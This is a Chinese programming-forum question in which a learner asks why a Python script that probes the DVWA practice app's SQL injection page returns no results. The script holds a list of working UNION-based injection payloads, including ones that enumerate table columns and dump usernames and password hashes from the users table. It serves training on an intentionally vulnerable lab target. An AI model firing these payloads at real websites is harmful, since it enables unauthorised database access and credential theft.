Ssssssongcf 2022-12-08 14:55 采纳率: 100%
浏览 67
已结题

dvwa里sql注入无返回结果

问题遇到的现象和发生背景
遇到的现象和发生背景,请写出第一个错误信息
用代码块功能插入代码,请勿粘贴截图。 不用代码块回答率下降 50%
运行结果及详细报错内容
我的解答思路和尝试过的方法,不写自己思路的,回答率下降 60%
我想要达到的结果,如果你需要快速回答,请尝试 “付费悬赏”

python脚本测试dvwa靶机
下面是代码
需要判断注入成功与否的代码、求帮助。

#-*- coding:utf-8 -*-
import requests

def post_http(sqlstr):
    url = 'http://192.168.56.101/vulnerabilities/sqli/?id='+sqlstr+'&Submit=Submit'
    req = requests.get(url,headers=headers)
    return(url,req.status_code,req.text)

list=["1' union select 1,version() --  ",
      "1' or 1=1 order by 1 – ",
      "union select 1,database()#",
      "  1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#",
      "1' union select user,password from users # "]
for sqlstr in list:
    headers = {'Cookie':'security=low; PHPSESSID=67rd36402q06bl7q01nr15cg94','Referer':'http://192.168.56.101/vulnerabilities/sqli/'}

    print('++++++++SQL注入++++++++')
    url, status_code, result = post_http(sqlstr)
    print(url + '|' + str(status_code))
    print(result)

  • 写回答

4条回答 默认 最新

      报告相同问题?

      相关推荐 更多相似问题

      问题事件

      • 系统已结题 12月23日
      • 已采纳回答 12月15日
      • 赞助了问题酬金20元 12月8日
      • 创建了问题 12月8日

      悬赏问题

      • ¥15 yolov5运行detect 过程中的报错一直无法解决
      • ¥15 jsx写法 插槽不生效的问题
      • ¥15 MATLAB 调用comsol如何加速设计?
      • ¥15 echarts地图添加点击事件
      • ¥15 openpyxl库无法全部写入文本到单元格
      • ¥15 不知道带什么标题好随便搞一个吧
      • ¥15 ffmpeg 图片合成视频
      • ¥15 软科大学爬取获取所有数据
      • ¥15 如何修改损失函数以及代码讲解
      • ¥15 有偿咨询!!程序的小数点怎么取到后四位啊!